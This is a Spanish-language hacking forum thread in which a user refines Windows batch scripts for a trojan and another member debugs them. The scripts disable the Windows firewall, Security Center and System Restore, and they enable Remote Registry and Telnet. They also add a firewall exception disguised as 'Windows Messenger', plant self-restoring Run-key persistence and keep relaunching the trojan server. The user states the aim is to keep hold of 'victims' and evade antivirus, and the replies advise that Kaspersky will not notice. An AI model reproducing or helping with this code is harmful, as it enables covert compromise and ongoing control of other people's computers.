if exist %windir%\system32\1234\lsass.exe ( start %windir%\system32\1234\lsass.exe )
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
:bucle
start /min explorer.exe
ping -n 120 localhost > nul
goto bucle
Y el otro .bat seria asi.
Citar:r
ping 127.0.0.1 /n 120
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v lsass
if %errorlevel%==1 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon /d "%windir%\system32\1234\ctfmon.bat" /f
goto r
Bueno ahi estarian los 2 .bat finales que despues los voy a pasar a .exe
Entonces esta todo bien.
Handle with care ;D
Suerte
Okas gracias a todo !! Stacker sos un groso :D jajaja. Despeus de terminar algunas cosas del troyano lo compilo al .bat y lo mando :D jaja. Mas tarde lo posteo en troyanos compilado puede que a la gente le sirva! Bye bye <.<
Me surgio una duda si tengo el troyano en system32/2145/server.exe podria llamarle haciendo esto.
Citarinicio:
if exist %windir%\system32\1234\server.exe ( start %windir%\system32\1234\lsass.exe )
ping -n 120 localhost > nul
goto inicio
esto haria que llamara si existiese el server.exe ahi cada 120 segundos ? esta bien hecho el code?
Asi lo agrego al bat y le saco esta parte
:bucle
start /min system.exe
ping -n 120 localhost > nul
goto bucle
por la otra que seria mas facil y mas eficaz
Esto llamaria a
lsass.exe si existe
server.exe, si lo que quieres es ejecutar el server deberia quedar así:
Citarif exist %windir%\system32\1234\server.exe ( start %windir%\system32\1234\server.exe )
Por otro lado tanto si es server.exe(server de un troyano) como lsass.exe(bucle), supongo que deberian estar siempre en ejecución por lo que al llamarlos una y otra vez acabarás bloqueando windows.
No se si te referias a eso
No Quiero hacer el bucle para llamar el server no quiero bloquearle la PC sino que llame a ese server silenciosamente en ejecucion. Tengo victimas con alto porcentaje de ping y cuando ejecuto denuevo el server vuelven inmediatamente :) y nose pierden y vuelven a la hora o cada 5 horas. Por eso el fin de este .bat es para eso. No perder nunca a la victima hasta que el antivirus te lo detecte :) y no perderlo por el ping o por otras causas Jeje. Espero respuesta tuya !! Nos vemos :D
Entiendo, creo que no deberia darte problemas. :)
Además supongo que tendrás ip fija, un no-ip o un sistema que te reporte la ip de la víctima (si no se encarga el propio troyano).
Ok entonces esta bien si existe server.exe va a ejecutar el bucle no? Y si se reinicia la PC se inicia otra vez el .bat y se va a fijar si está y si es asi va a empezar otra vez el bucle verdad?
Así es. Pero, no entiendo al ver otra vez el código porqué si existe server.exe se ejecuta lsass.exe cada x segundos.
No.. Si existe server.exe if exist, vendria a responder al bucle creo. Osea me entendes si existe server.exe empieza a hacer el bucle otra vez de 120 seg.
CitarNo.. Si existe server.exe if exist, vendria a responder al bucle creo. Osea me entendes si existe server.exe empieza a hacer el bucle otra vez de 120 seg.
OK
Dudas aqui !!
@echo off
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v server.exe /t REG_SZ /d "%windir%\ctfmon\1234\server.exe:*:Enabled: Windows Messenger"
[color=red]REG ADD "hklm\software\microsoft\windows\currentversion\run" /v ctfmon.bat /d[/color] %windir%\system32\2114\ctfmon.bat /f
if exist %windir%\system32\2114\lsass.exe ( start %windir%\system32\2114\lsass.exe )
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
inicio:
if exist %windir%\system32\2114\system32.exe ( start /min %windir%\system32\2114\system32.exe )
ping -n 100 localhost > nul
goto inicio
Esto %windir%system32\2114\ es la ubicacion donde se aloja el troyano una pregunta system32 tiene algun abreviado en codigo como %windir% que seria Window? se pueden poner 2 if exist en un mismo bat? uno para llamar a otro bat y otro ubicado en el bucle como ves. Otra pregunta lo rojo eso agrega el .bat al msconfig cuando se reinicia la pc vuelve a ejecutarse el bat verdad?
El otro bat que seria este..
:r
ping 127.0.0.1 /n 120
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [color=red]lsass[/color]
if %errorlevel%==1 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon /d "%windir%\system32\2114\ctfmon.bat" /f
goto r
la parte roja ahi no tendria que ser lsass.exe ?
Ahi ta esas mis dudas espero que me puedas ayudar otra vez.. y decirme si el bat esta bien.
Hola de nuevo.
Creo que no hay una varible de entorno para system32, %windir%\system32 es lo más corto que te asegura a la vez no equivocarte de unidad. (que puede no ser C:)
La parte en rojo está bien si lo que quieres ejecutar al inicio el ctfmon.bat.
Y por último, sí, se pueden poner cuantos if exist quieras, pero ten en cuenta:
-El primero de tu script se ejecuta una vez al inicio (lsass.exe).
-El segundo se está ejecutando constantemente cada 100 pings siempre que exista system32.exe
Espero haberte ayudado. Pero para asegurarme de mi respuesta, ¿cual era el nombre de este script? ¿ctfmon.bat? - me lo he preguntado porque crei que ibas a compilarlo. :huh:
Si no es así explicame que nombre tiene cada archivo para que pueda darte una respuesta definitiva.
Saludos
Hola si el primero es ctfmon.bat y el segundo es lsaas.bat si los voy a compilar luego osea que los tendria que modificar por .exe a algunas partes :p el primero que hace todo lo que dice y llama al segundo si existe. El segundo bat seria el que se fija si existe ctmon.bat y sino existe vuelve a crearla, creo que los 2 bat estan bien. Pero los ejecute en modo .bat en un cyber mas tarde te digo la ventana del cmd de los bat porque no me reconoce algunas cosas. Como /v y otras cosas si puedo voy a ejecutarlos en el cyber en .bat para no tener errores. Espero respuesta tuya :)
Ya lo veo más claro. La parte en rojo (segundo código) tiene que ser ctfmon.bat, ya que es el valor de clave run a restaurar, iba un poco con prisa la ultima vez. ;)
A parte de eso, todo bien.
Espero las capturas del cyber para solucionar los errores que pueda haber.
Saludos
Mira estas son las 2 cositas que me tira.. y nose porqué con respecto a este .bat
@echo off
:inicio
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v server.exe /t REG_SZ /d "%windir%\ctfmon\1234\server.exe:*:Enabled: Windows Messenger"
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v ctfmon.bat /d %windir%\system32\2114\ctfmon.bat /f
if exist %windir%\system32\2114\lsass.exe ( start %windir%\system32\2114\lsass.exe )
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
inicio:
if exist %windir%\system32\2114\system32.exe ( start /min %windir%\system32\2114\system32.exe )
ping -n 100 localhost > nul
goto inicio
Estas son las 2 cosas que me tira
http://www.subirimagenes.com/otros-asd0001-295568.html
Ahi el error ese /v solamente. y el otro error que nose ve es algo asi: "inicio:" nose reconoce como coso interno o externo,etc.. Sabes porque?
El /v no se reconoce... tiene que ser porque has pasado a partir de ahí a otra línea (has partido el comando reg add).
Y el de inicio: no se reconoce... es porque los dos puntos tienen que ir al principio de la etiqueta y por otro lado no se pueden repetir las etiquetas (puedes poner :inicio2 o cualquier otra).
Prueba esto creo que deberia funcionar perfectamente.
Otra cosa, creo que es mejor cambiar el orden en el apartado de los servicios, es decir, primero cambiar el valor del registro y luego intentar iniciarlo (para el caso en que estuviera deshabilitado).
Saludos
Hola si probe no entendi lo del reg add.. eso creo que esta bien va separado
reg add el problema del inicio lo solucione gracias pero lo otro es el problema para agregar la exclusion en el firewall de windows el /v server.exe intente sacando el /v y no me tiro mas el error pero me lo tiro con el server.exe nose reconoe como un comando interno o externo bla bla.. nose porqué no esta bien la exclusion?
Hola
El comando:
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v server.exe
/t REG_SZ /d "%windir%\ctfmon\1234\server.exe:*:Enabled: Windows Messenger"
debe de ir todo en una línea, /v es un parámetro del comando. Por eso si lo pones en una línea aparte salta un error, ya que no se reconoce como un comando ni como un ejecutable. Al quitar /v se queda como principio de línea server.exe y por la misma razón vuelve a aparecer el error pero con server.exe.
Si te das cuenta dejándolo dividido en dos líneas, la primera queda: reg add [clave] que solo crea una clave de registro vacia. Y la segunda línea ya que solo son parámetros no hace nada y devuelve un error.
Ah.. listo ya lo puse a la exclusion todo en una linea ahora lo pruebo y te digo despues.... lo otro esta bien ya creo.
Esto...
Citar:r
ping 127.0.0.1 /n 120
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon
if %errorlevel%==1 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon /d "%windir%\system32\2114\ctfmon.bat" /f
goto r
Desde re querry hasta /f va todo en una linea?
No, en este caso el reg query ... llega hasta /v ctfmon, que consulta la clave. Y en la otra línea otro comando (if) que comprueba si se pudo realizar la consulta, si no, es que la clave no existe y la vuelve a crear.
Ah ok.. creo que ya esta.. supongo :P el kaspersky se capta de alguna modificacion asi en el registro y demas por mi .bat? espero que no asi no me delata xD
Con el Kaspersky (y culaquier otro antivirus "convencional") no se pueden detectar éstos cambios en el registro. Lo único que puede darte problemas del Kaspersky es el firewall si está activo. - Además de que no detecte el troyano... ;)
Saludos
El firewall me va a detectar la conexion inversa UDP de la maquina.. pero no el .bat supongo bueno entonces todo pasa por hacer indetectable al AV.. Bueno saludos y gracias !